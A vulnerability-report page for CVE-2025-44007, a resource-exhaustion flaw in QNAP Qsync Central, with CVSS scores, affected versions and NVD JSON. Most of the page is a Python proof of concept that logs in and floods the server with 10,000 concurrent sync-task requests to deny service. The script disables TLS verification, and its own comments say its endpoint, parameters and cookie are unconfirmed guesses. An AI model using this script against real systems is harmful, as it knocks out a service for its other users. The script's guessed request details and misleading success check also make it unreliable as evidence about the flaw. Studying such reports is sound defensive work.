Security Vulnerability Report
CVE-2025-44007 CVSS 6.5 MEDIUM

CVE-2025-44007

Published: 2025-10-03 18:15:35
Last Modified: 2025-10-08 15:18:41

Description

An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource. We have already fixed the vulnerability in the following version: Qsync Central 5.0.0.1 ( 2025/07/09 ) and later

CVSS Details

CVSS Score
6.5 (CVSS v3.1 base score; the record's raw data also carries a CVSS v4.0 base score of 7.1 HIGH)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qsync_central:*:*:*:*:*:*:*:* - VULNERABLE
QNAP Qsync Central >= 4.2.0.0 and < 5.0.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-44007 - QNAP Qsync Central Resource Exhaustion PoC
# This PoC demonstrates how an authenticated attacker can exhaust
# server resources by sending a large number of resource-consuming requests.
#
# NOTE(review): the CVE description names no endpoint, parameter or cookie.
# The URL path, the "action" values and the "sid" cookie used below are
# unconfirmed here; verify them against a lab instance before treating any
# result of this script as evidence about a server.
#
# Weakness class is CWE-770 (allocation of resources without limits or
# throttling). The fix listed for this CVE is Qsync Central 5.0.0.1 and later.
import requests
import threading
import time
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

# Configuration
# These are defaults only; main() replaces host, username and password when
# three command-line arguments are supplied.
TARGET_HOST = "https://qsync-target.example.com"  # Target Qsync Central server
USERNAME = "victim_user"  # Valid Qsync account
PASSWORD = "P@ssw0rd!"  # Account password
SYNC_FOLDER = "/test_sync"  # Sync folder path
MAX_THREADS = 50  # Number of concurrent threads
REQUESTS_PER_THREAD = 200  # Requests per thread


class QsyncResourceExhaustion:
    """PoC for CVE-2025-44007: Allocation of Resources Without Limits or Throttling

    Holds one HTTP session plus two counters (successful and failed requests)
    that worker threads update under ``self.lock``.
    """

    def __init__(self, host, username, password):
        """Store the target and credentials and create the shared session.

        Args:
            host: Base URL of the server; a trailing "/" is stripped.
            username: Account name sent in the login request.
            password: Account password sent in the login request.
        """
        self.host = host.rstrip("/")
        self.username = username
        self.password = password
        self.session = requests.Session()
        # Turns off TLS certificate validation for every request made through
        # this session, including the login POST that carries the password.
        self.session.verify = False
        self.success_count = 0
        self.fail_count = 0
        # Guards the two counters above; they are incremented from many threads.
        self.lock = threading.Lock()

    def authenticate(self):
        """Authenticate to Qsync Central and obtain session cookie

        Returns:
            True when the login POST answers HTTP 200 and the session's cookie
            jar then contains a cookie named "sid"; False otherwise, including
            when the request raises.
        """
        login_url = f"{self.host}/cgi-bin/qsync/qsync.cgi"
        payload = {
            "action": "login",
            "username": self.username,
            "password": self.password
        }
        try:
            resp = self.session.post(login_url, data=payload, timeout=10)
            if resp.status_code == 200 and "sid" in self.session.cookies:
                print(f"[+] Authenticated successfully as {self.username}")
                return True
            print(f"[-] Authentication failed: {resp.status_code}")
            return False
        except Exception as e:
            # Any exception (DNS, TLS, timeout, ...) is reported as a
            # connection error and treated as a failed login.
            print(f"[-] Connection error during auth: {e}")
            return False

    def create_sync_session(self, thread_id, req_id):
        """Repeatedly create sync sessions to exhaust server resources

        Sends a single POST per call; the repetition comes from
        run_exhaustion() submitting this method many times.

        Args:
            thread_id: Accepted but not used in the body.
            req_id: Accepted but not used in the body.

        Returns:
            The HTTP status code, or None when the request timed out or raised.
        """
        url = f"{self.host}/cgi-bin/qsync/qsync.cgi"
        params = {
            "action": "create_sync_task",
            "folder": SYNC_FOLDER,
            "mode": "continuous",
            "conflict_policy": "rename"
        }
        try:
            # `params=` places the values in the URL query string, not the body.
            # NOTE(review): every worker thread uses the same requests.Session;
            # requests does not document Session as thread-safe.
            resp = self.session.post(url, params=params, timeout=15)
            with self.lock:
                # Anything other than HTTP 200 counts as a failure, so 401, 403
                # and 404 responses land in fail_count as well.
                if resp.status_code == 200:
                    self.success_count += 1
                else:
                    self.fail_count += 1
            return resp.status_code
        except requests.exceptions.Timeout:
            with self.lock:
                self.fail_count += 1
            return None
        except Exception:
            # Every other exception is also counted as a failure, and the
            # cause is discarded.
            with self.lock:
                self.fail_count += 1
            return None

    def run_exhaustion(self):
        """Launch multi-threaded resource exhaustion attack

        Submits MAX_THREADS * REQUESTS_PER_THREAD calls to
        create_sync_session() (10,000 with the defaults above) to a pool of
        MAX_THREADS workers, waits for all of them, then prints the counters.

        Seen from the server, this is one authenticated session issuing a burst
        of identical POSTs. That maps to the controls CWE-770 calls for:
        per-account quotas and request throttling.
        """
        print(f"[*] Starting resource exhaustion with {MAX_THREADS} threads")
        print(f"[*] Target: {self.host}")
        print(f"[*] Sending {MAX_THREADS * REQUESTS_PER_THREAD} total requests...")
        start_time = time.time()
        with ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
            futures = []
            for t in range(MAX_THREADS):
                for r in range(REQUESTS_PER_THREAD):
                    futures.append(
                        executor.submit(self.create_sync_session, t, r)
                    )
            for future in as_completed(futures):
                pass  # Results tracked via counters
        elapsed = time.time() - start_time
        print(f"\n[+] Attack completed in {elapsed:.2f}s")
        print(f"[+] Successful requests: {self.success_count}")
        print(f"[+] Failed/timeout requests: {self.fail_count}")
        # NOTE(review): this threshold fires when failures exceed 30% of
        # successes. fail_count includes every non-200 status and every
        # exception, so a wrong endpoint, an expired session or a patched
        # server that rejects the request triggers the same message. It is not
        # proof of resource exhaustion.
        if self.fail_count > self.success_count * 0.3:
            print("[!] Server appears to be experiencing resource exhaustion!")


def main():
    """Pick the target and credentials, log in, then run the request burst.

    With three or more command-line arguments, they are read as target,
    username and password; otherwise the module-level defaults are used.
    Exits with status 1 when authentication fails.
    """
    # Silences urllib3 warnings, including the insecure-request warning that
    # verify=False would otherwise raise on every call.
    requests.packages.urllib3.disable_warnings()
    if len(sys.argv) >= 4:
        target = sys.argv[1]
        username = sys.argv[2]
        # A password passed on the command line is typically visible in the
        # host's process listing and shell history.
        password = sys.argv[3]
    else:
        target = TARGET_HOST
        username = USERNAME
        password = PASSWORD
    exploit = QsyncResourceExhaustion(target, username, password)
    if exploit.authenticate():
        exploit.run_exhaustion()
    else:
        print("[-] Exiting: authentication required for this vulnerability")
        sys.exit(1)


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-44007", "sourceIdentifier": "[email protected]", "published": "2025-10-03T18:15:35.383", "lastModified": "2025-10-08T15:18:41.437", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An allocation of resources without limits or throttling vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to prevent other systems, applications, or processes from accessing the same type of resource.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.1 ( 2025/07/09 ) and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qsync_central:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2.0.0", "versionEndExcluding": "5.0.0.1", "matchCriteriaId": "1CCFCB2F-05FA-460B-BD0D-966E7CE58D8A"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-34", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}